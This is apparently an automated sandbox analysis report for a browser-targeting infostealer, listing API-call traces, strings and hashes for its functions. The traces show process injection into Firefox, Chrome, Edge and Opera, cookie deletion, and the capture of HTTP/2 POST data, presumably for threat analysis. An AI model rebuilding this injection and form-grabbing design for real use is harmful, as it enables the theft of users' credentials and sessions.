                                                        • Instruction Fuzzy Hash: 4301D430400601AFDB28BB64EC58BEB3B9CFF85711F118529B5D6871E2CA7B8A41CF65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 114 83be1-83c3a call 81000 * 2 wsprintfA call 81235 121 83c3c-83c4c call 81141 114->121 122 83c5e 114->122 128 83c4e call 83829 121->128 129 83c53-83c59 call 81261 121->129 124 83c64-83c74 CreateToolhelp32Snapshot 122->124 126 83c7a-83c8e Process32First 124->126 127 83d7d-83d88 Sleep 124->127 130 83d6e-83d70 126->130 127->124 128->129 129->122 133 83c93-83ca5 lstrcmpi 130->133 134 83d76-83d77 CloseHandle 130->134 135 83cda-83ce3 call 812aa 133->135 136 83ca7-83cb5 lstrcmpi 133->136 134->127 142 83d62-83d68 Process32Next 135->142 143 83ce5-83cee call 81305 135->143 136->135 137 83cb7-83cc5 lstrcmpi 136->137 137->135 139 83cc7-83cd4 call 82ea8 137->139 139->135 139->142 142->130 143->142 147 83cf0-83cf7 call 81320 143->147 147->142 150 83cf9-83d06 call 81274 147->150 150->142 153 83d08-83d5d lstrcmpi call 81090 call 81fe5 call 81090 150->153 153->142
                                                        APIs
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • wsprintfA.USER32 ref: 00083C1F
                                                          • Part of subcall function 00081235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                                          • Part of subcall function 00081235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                                        • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                                        • lstrcmpi.KERNEL32(?,firefox.exe), ref: 00083CA1
                                                        • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 00083CB1
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083CC1
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083D12
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00083D68
                                                        • CloseHandle.KERNELBASE(00000000), ref: 00083D77
                                                        • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                        • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                                        • API String ID: 2509890648-2554907557
                                                        • Opcode ID: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                                        • Instruction ID: b3decc60f1b6fd0102e2c0e98a0bf13bb15c07833eab530b9c5dae2245e78d24
                                                        • Opcode Fuzzy Hash: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                                        • Instruction Fuzzy Hash: AF41E6316047029BD614BB74EC45ABF37ADBF94B40F000518B9D297192EF39DE068BA6

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 180 81235-81247 OpenFileMappingA 181 81249-81259 MapViewOfFile 180->181 182 8125c-81260 180->182 181->182
                                                        APIs
                                                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$MappingOpenView
                                                        • String ID:
                                                        • API String ID: 3439327939-0
                                                        • Opcode ID: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                                        • Instruction ID: 31edbaac02ff07a1b824ab005dc06848c6bb7be7fdd6de8e3064e283bb2ae97a
                                                        • Opcode Fuzzy Hash: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                                        • Instruction Fuzzy Hash: 5ED017327052327BE3706ABB6C0CF836EDDEF86AE1B014025B649D2150D6608821C7F0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 183 81261-81273 UnmapViewOfFile CloseHandle
                                                        APIs
                                                        • UnmapViewOfFile.KERNEL32(00000000,00000000,00083C5E,00000001), ref: 00081265
                                                        • CloseHandle.KERNELBASE(?), ref: 0008126C
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CloseFileHandleUnmapView
                                                        • String ID:
                                                        • API String ID: 2381555830-0
                                                        • Opcode ID: f9525f4a91e8645a93b96e0a949e679c081eab0605ddecb765d952afeb12ae9a
                                                        • Instruction ID: c184eb3bb083f7b6bb603a86e3cff50339feff78dbb80b7db0fead9aac5e1450
                                                        • Opcode Fuzzy Hash: f9525f4a91e8645a93b96e0a949e679c081eab0605ddecb765d952afeb12ae9a
                                                        • Instruction Fuzzy Hash: D3B01237419031D7D31427747C0C8CB3E18FF492213028540F24E82011473C08419FF5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 184 81000-81010 GetProcessHeap RtlAllocateHeap
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateProcess
                                                        • String ID:
                                                        • API String ID: 1357844191-0
                                                        • Opcode ID: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                                        • Instruction ID: 4deb57588eb96029a35becf2c55eca230ebc00b67c115c5e18b133d903a3b778
                                                        • Opcode Fuzzy Hash: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                                        • Instruction Fuzzy Hash: 0EA002B59501115BFE4457E4BD0DB173518B744745F248544738685050A97854148F21

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,756F3E2E), ref: 0008201A
                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00082055
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000820E5
                                                        • RtlMoveMemory.NTDLL(00000000,000850A0,00000016), ref: 0008210C
                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00082134
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00082144
                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0008215E
                                                        • GetLastError.KERNEL32 ref: 00082166
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082174
                                                        • Sleep.KERNEL32(000003E8), ref: 0008217B
                                                        • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00082191
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00082198
                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821AE
                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821D8
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000821EB
                                                        • CloseHandle.KERNEL32(00000000), ref: 000821F2
                                                        • Sleep.KERNEL32(000001F4), ref: 000821F9
                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0008220D
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00082224
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082231
                                                        • CloseHandle.KERNEL32(?), ref: 00082237
                                                        • CloseHandle.KERNEL32(?), ref: 0008223D
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082240
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                        • String ID: atan$ntdll$opera_shared_counter
                                                        • API String ID: 1066286714-2737717697
                                                        • Opcode ID: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                                        • Instruction ID: b8529cd7b6f7b3f81938f29da9ae38e819e5d60d405e704a022585a417c3316f
                                                        • Opcode Fuzzy Hash: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                                        • Instruction Fuzzy Hash: 56616D71508315AFE710AF658C88E6B7BECFB88754F000629BA89D3291D778DD058F66

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 000815F7
                                                        • lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                                        • lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                                        • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00081661
                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008167E
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                                        • FindClose.KERNEL32(00000000), ref: 000816AB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                                        • String ID: *.*$Cookies*
                                                        • API String ID: 4256701249-3228320225
                                                        • Opcode ID: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                                        • Instruction ID: 8b79dbc0752a28f5ad1f1006910a533587f018e208c1d15e1b3a33415b5554fa
                                                        • Opcode Fuzzy Hash: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                                        • Instruction Fuzzy Hash: 832167712043169BD710BB60AC84ABF7BDCBF89795F040529FAC5D3241EB78DD464BA2

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 463 814d8-81527 call 813fe call 81000 wsprintfW FindFirstFileW 468 81599-815a6 call 81011 463->468 469 81529 463->469 471 8152b-81530 469->471 473 8157e-8158c FindNextFileW 471->473 474 81532-8153d call 813d7 471->474 473->471 475 8158e-81595 FindClose 473->475 474->473 478 8153f-81565 call 81000 wsprintfW 474->478 475->468 481 81570-81579 DeleteFileW call 81011 478->481 482 81567-8156a SetFileAttributesW 478->482 481->473 482->481
                                                        APIs
                                                          • Part of subcall function 000813FE: wsprintfW.USER32 ref: 0008142A
                                                          • Part of subcall function 000813FE: FindFirstFileW.KERNEL32(00000000,?), ref: 00081439
                                                          • Part of subcall function 000813FE: wsprintfW.USER32 ref: 00081476
                                                          • Part of subcall function 000813FE: RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                                          • Part of subcall function 000813FE: FindNextFileW.KERNEL32(00000000,00000010), ref: 000814AF
                                                          • Part of subcall function 000813FE: FindClose.KERNEL32(00000000), ref: 000814BA
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • wsprintfW.USER32 ref: 0008150D
                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                        • wsprintfW.USER32 ref: 00081557
                                                        • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                        • FindClose.KERNEL32(00000000), ref: 0008158F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                        • String ID: %s%s$*.*
                                                        • API String ID: 2055899612-705776850
                                                        • Opcode ID: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                                        • Instruction ID: 5bb26f6c1dc7bd09f101a8d25e391cda339d68d8b89c612bbdf1b72f2cef919b
                                                        • Opcode Fuzzy Hash: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                                        • Instruction Fuzzy Hash: 1F11B7312007055BE310BB649C49AEF7BDCFF95755F000519FED2922D3EB788A4687A6
                                                        APIs
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • wsprintfW.USER32 ref: 0008142A
                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00081439
                                                        • wsprintfW.USER32 ref: 00081476
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                          • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                                          • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                          • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                          • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                          • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                        • RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000814AF
                                                        • FindClose.KERNEL32(00000000), ref: 000814BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                        • String ID: %s%s$%s%s\$*.*
                                                        • API String ID: 2055899612-4093207852
                                                        • Opcode ID: fc9ea9a760a63c4b6c0563a6d2535c86a417247367b891c16f671a48bc96e344
                                                        • Instruction ID: 7a152c0ea108eeacf04616a90babe5037b3a522f46ac4564a06091ccefb20d83
                                                        • Opcode Fuzzy Hash: fc9ea9a760a63c4b6c0563a6d2535c86a417247367b891c16f671a48bc96e344
                                                        • Instruction Fuzzy Hash: D21190302043416BE710BB25EC49AFF76DCFFD5355F000529FAC192292DB79484A8B62
                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                                        • lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                                        • wsprintfA.USER32 ref: 00081205
                                                        • CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                        • String ID: %02X
                                                        • API String ID: 3341110664-436463671
                                                        • Opcode ID: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                                        • Instruction ID: 298286c9a9371f5bd7e7a063f8446572b34c6f4efce2401be2fb8dd3adceacc5
                                                        • Opcode Fuzzy Hash: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                                        • Instruction Fuzzy Hash: 62113D71900109BFEB119F95EC88EEFBBBCFB44701F104065F645E2150DB754E559B60
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 000816D9
                                                        • GetCurrentThreadId.KERNEL32 ref: 000816E1
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008171E
                                                        • SuspendThread.KERNEL32(00000000), ref: 0008172E
                                                        • CloseHandle.KERNEL32(00000000), ref: 0008173D
                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0008174D
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081758
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                        • String ID:
                                                        • API String ID: 1467098526-0
                                                        • Opcode ID: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                                        • Instruction ID: 9f8a97b458fd6a1e1d725efe8f807f36da717ca79b52438bb26f371cecc15507
                                                        • Opcode Fuzzy Hash: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                                        • Instruction Fuzzy Hash: 53113C72408212EBE711AF60AC48AAFBFF8FF85711F05041DF6C592150D738894A9FA7
                                                        APIs
                                                        • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                                        • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                                        • StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                                          • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                          • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                                                        • String ID: NetworkService
                                                        • API String ID: 1656241333-2019834739
                                                        • Opcode ID: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                                        • Instruction ID: 2a2cb19856545ee97dced0d83344d7303902199a923c80ef4bb46b56f5b20446
                                                        • Opcode Fuzzy Hash: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                                        • Instruction Fuzzy Hash: EC01D471300346BFE7247B219C49FAB3A9DFFD8392F014029F68AD6142DAB59C808B20
                                                        APIs
                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00081E83
                                                        • LoadLibraryA.KERNEL32(?), ref: 00081EAB
                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00081ED8
                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081F29
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                        • String ID:
                                                        • API String ID: 3827878703-0
                                                        • Opcode ID: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                                        • Instruction ID: 568ebf0d0beaab3ca419b44d6bddffa2e7cdb8569d387974d06ed25d6f468c67
                                                        • Opcode Fuzzy Hash: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                                        • Instruction Fuzzy Hash: A4317A72700216ABCB689F29CC84BA6B7ECFF15354B15456CE986CB201D735E846CBA4
                                                        APIs
                                                        • StrStrIA.SHLWAPI(chrome.exe|opera.exe|msedge.exe,?), ref: 00082EB4
                                                          • Part of subcall function 00082E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                                          • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                                          • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                                          • Part of subcall function 00082E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                                        Strings
                                                        • chrome.exe|opera.exe|msedge.exe, xrefs: 00082EAB
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process$InformationQuery$Open
                                                        • String ID: chrome.exe|opera.exe|msedge.exe
                                                        • API String ID: 4117927671-3743313796
                                                        • Opcode ID: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                                        • Instruction ID: 74462bb72cca3f48bcbab1f2b981006a3a1547241742571b3dc85306c1ef6728
                                                        • Opcode Fuzzy Hash: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                                        • Instruction Fuzzy Hash: C6D0A932300222072B2C367A6C0A86FA48DEBC2A62302013EF982C7240EA908C0343A4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 222 82974-829a2 223 829a8-829aa 222->223 224 82b65-82b6d 222->224 223->224 225 829b0-829b9 call 81765 223->225 225->224 228 829bf-829c1 225->228 228->224 229 829c7-829c9 228->229 229->224 230 829cf-829df call 81141 229->230 230->224 233 829e5-82a0d call 81000 * 3 230->233 240 82a11 call 8104c 233->240 241 82a16-82a30 call 8285f 240->241 244 82a4c-82a64 call 8285f 241->244 245 82a32-82a42 call 8285f 241->245 251 82a6e-82a85 call 8285f 244->251 252 82a66-82a6c lstrcat 244->252 245->244 250 82a44-82a4a lstrcat 245->250 250->244 255 82a8f-82ab2 RtlZeroMemory call 8285f 251->255 256 82a87-82a8d lstrcat 251->256 252->251 259 82ac3 255->259 260 82ab4-82ac1 StrToIntA 255->260 256->255 261 82ac7-82ac9 259->261 260->261 262 82acb-82ace 261->262 263 82b42-82b64 call 8105d call 81011 * 3 261->263 262->263 265 82ad0-82ad7 262->265 263->224 265->263 267 82ad9-82adf 265->267 269 82ae5 call 8104c 267->269 271 82aea-82b29 wnsprintfA call 828ad 269->271 277 82b2b-82b2d lstrcat 271->277 278 82b2f-82b3e lstrcat * 2 271->278 277->278 278->263
                                                        APIs
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                          • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                                          • Part of subcall function 0008285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 000828A2
                                                        • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00082A4A
                                                        • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00082A6C
                                                        • lstrcat.KERNEL32(?,dyn_header_ua), ref: 00082A8D
                                                        • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082A96
                                                        • StrToIntA.SHLWAPI(00000000), ref: 00082AB9
                                                        • wnsprintfA.SHLWAPI ref: 00082B0D
                                                        • lstrcat.KERNEL32(00000000,?), ref: 00082B2D
                                                        • lstrcat.KERNEL32(00000000,{:!:}), ref: 00082B35
                                                        • lstrcat.KERNEL32(00000000,?), ref: 00082B3C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                                                        • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                                                        • API String ID: 2605944266-950501416
                                                        • Opcode ID: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                                        • Instruction ID: d8dd03a251d738af89b9767004e5c399ca865ed0c4bb03e024ab117a7b61717e
                                                        • Opcode Fuzzy Hash: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                                        • Instruction Fuzzy Hash: BF516D706043419BDB19BF24C984AAEBBDABF98304F04081DF8C597293DB78DC468B66

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                        • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                                        • StrToIntA.SHLWAPI(?), ref: 00083024
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                                        • wsprintfA.USER32 ref: 000830B9
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                                        • lstrcat.KERNEL32(?,{:!:}), ref: 000830F8
                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,00086038), ref: 00083109
                                                        • RtlMoveMemory.NTDLL(00000000), ref: 00083112
                                                          • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                          • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
